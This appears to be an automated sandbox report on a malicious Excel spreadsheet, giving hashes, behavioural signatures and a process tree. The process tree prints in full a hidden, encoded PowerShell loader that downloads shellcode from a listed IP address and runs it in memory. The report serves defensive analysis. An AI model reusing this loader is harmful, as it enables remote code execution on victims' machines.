Analysis
-
max time kernel
16s -
max time network
22s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
13-11-2024 21:45
Behavioral task
behavioral1
Sample
35cdf01f357d5cc70735fc5c0e1dda448d4ba79786e9cba60f31b97139953727.xls
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
35cdf01f357d5cc70735fc5c0e1dda448d4ba79786e9cba60f31b97139953727.xls
Resource
win10v2004-20241007-en
General
-
Target
35cdf01f357d5cc70735fc5c0e1dda448d4ba79786e9cba60f31b97139953727.xls
-
Size
46KB
-
MD5
4360b82910d2577e2fbb3f10e423395c
-
SHA1
9d3d039e74400e7ea02bf359af9ba31fe36cec8e
-
SHA256
35cdf01f357d5cc70735fc5c0e1dda448d4ba79786e9cba60f31b97139953727
-
SHA512
7c971060c5a40a961ea6c742f17afc879d82ca828f1beb886aeb8e1dddcf6a3a9e12a799b26e99c42b65f2d3808b781b6eb4d101315cee2cb807ecc68b9a3de9
-
SSDEEP
768:3X4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9UF:YSFsv66g3KnF439NKC54kkGfn+cL2Xd+
Malware Config
Extracted
https://194.182.164.149:8080/fontawesome.woff
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2700 2180 powershell.exe 29 -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid Process 4 2700 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
EXCEL.EXEpowershell.execsc.execvtres.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid Process 2180 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid Process 2700 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 2700 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
EXCEL.EXEpid Process 2180 EXCEL.EXE 2180 EXCEL.EXE 2180 EXCEL.EXE 2180 EXCEL.EXE 2180 EXCEL.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
EXCEL.EXEpowershell.execsc.exedescription pid Process procid_target PID 2180 wrote to memory of 2700 2180 EXCEL.EXE 30 PID 2180 wrote to memory of 2700 2180 EXCEL.EXE 30 PID 2180 wrote to memory of 2700 2180 EXCEL.EXE 30 PID 2180 wrote to memory of 2700 2180 EXCEL.EXE 30 PID 2700 wrote to memory of 2616 2700 powershell.exe 32 PID 2700 wrote to memory of 2616 2700 powershell.exe 32 PID 2700 wrote to memory of 2616 2700 powershell.exe 32 PID 2700 wrote to memory of 2616 2700 powershell.exe 32 PID 2616 wrote to memory of 2224 2616 csc.exe 33 PID 2616 wrote to memory of 2224 2616 csc.exe 33 PID 2616 wrote to memory of 2224 2616 csc.exe 33 PID 2616 wrote to memory of 2224 2616 csc.exe 33
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\35cdf01f357d5cc70735fc5c0e1dda448d4ba79786e9cba60f31b97139953727.xls1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\icp8hnk9.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2616 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES60F6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC60F5.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2224
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5afd30f94fe7322c1ee9ab693e6bd5f90
SHA12d344aa75a3c94f8a337258afb48c9128e05709a
SHA25632ee54786573e27f4455ddb560bda3f1850f0638f3e4ebc2f85b8c8f8038c5df
SHA512516bd9f4a1c8bda300c96c860c880724c52d58655284d8c4db41309465109479e1a8fff036bd450dfe09f017c8ebf71b0bc0000ea72190a83c107556786c9d9c
-
Filesize
3KB
MD5c5cae500aff3c1efbd06f98b3cc3be2c
SHA19e79d883158041da14744e8ae3e314181b8be2c3
SHA256e5359f4788facd29ce0200289cf41a752c3b687ea0cc76bd292f1a4ef692ffea
SHA512e792c1ef3d07addfee8fff9fb1c948c3843d1eec09aeb1db21b3f563a3914b2be9b86c1ebbbd951a56ffdc9c35eef048c12db6bb4c12578de1ef3871401e760d
-
Filesize
7KB
MD59d938266241415f64c0d48ae76769b44
SHA1bf2a679c82f1633eaa0687667e0b84176be78a29
SHA2568faac177fc18da9e311aee0d6226115c771e331453258342b6da4f6f59db9d17
SHA5122f084d6cb2ea95788ef41255b5aa12f6a27d528b91113b580a744dc823b8fa95369369542e243ad7285215087cad7e95e1cce2e90c041d6164e5d0dd927ac3de
-
Filesize
652B
MD5d6c8c84953a51afac1c98ebfb1fecd5b
SHA18b7f7de6930a6a233ac6c144c23769266cc77603
SHA256dc372fd64a45da98e7ed8d53d15c11347d4f7a2d02ae42a69dac70113006f6b5
SHA5122bfdbabe31ee2646cf5410fca8f29cd56a42b9c7c85b2980339506e88a6051295c2398ab25fafa491a853573a9348671ff09c15da67bf5457360e628be9bd284
-
Filesize
631B
MD5f4dd5c682eb7b3b679f084261bfc7c4c
SHA170f75d7a4e42c185eb09139ed3c6f7338a2219c2
SHA2562908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
SHA5128f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d
-
Filesize
309B
MD511ed3c3201d0413eadea8ba25683e84d
SHA1099469b92523c83370eef0ccf5577810fbc94f09
SHA25667174016f4939bfe4fce470047a74209398dd0f0aa088eae36ba162a98c085a7
SHA512251d52d446645eaceb34812b44bc92c33c4f21f1db4b77454e876c63fa7aab6ec9feba69ca44e92faf6938ffc262faa1ed023033eedd4337f787857d5972895e